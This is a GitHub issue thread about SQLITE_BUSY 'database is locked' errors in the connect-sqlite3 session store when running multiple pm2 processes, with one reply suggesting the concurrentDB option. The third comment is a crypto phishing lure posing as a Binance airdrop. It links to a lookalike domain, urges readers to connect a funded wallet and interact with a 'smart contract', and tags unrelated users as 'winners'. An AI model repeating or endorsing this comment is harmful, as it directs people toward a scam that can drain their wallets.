### ISSUE TITLE
SQLITE_BUSY errors when running multiple processes

### ISSUE THREAD

**Issue by nathanieltagg** [rawberg/connect-sqlite3#25]
Hi,
I'm new to clustering.  I opted to try pm2 as my clustering method, since that seemed easiest.  However, this yields a lot of errors like:
Error: SQLITE_BUSY: database is locked

It also appears that many times, the session isn't being retrieved. I can see that the ./session file is getting updated, though.

I'm guessing that what's happening is that many small files are being accessed all at once, and that is logjamming the server, but I can't tell. 

Do I have something misconfigured, or is this a limitation of the store?

**Comment by lkoczorowski** [comment]
Have you tried with `{ concurrentDB: true }` ?
eg. 
`var sqlStore = new SQLiteStore( { dir: config.volume, db: 'sessions.db', concurrentDB: true })`

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @matin, @cjie888, @bliutech, @kigawas, @Puneetmeena, @shaoxyz, @chaseSpace
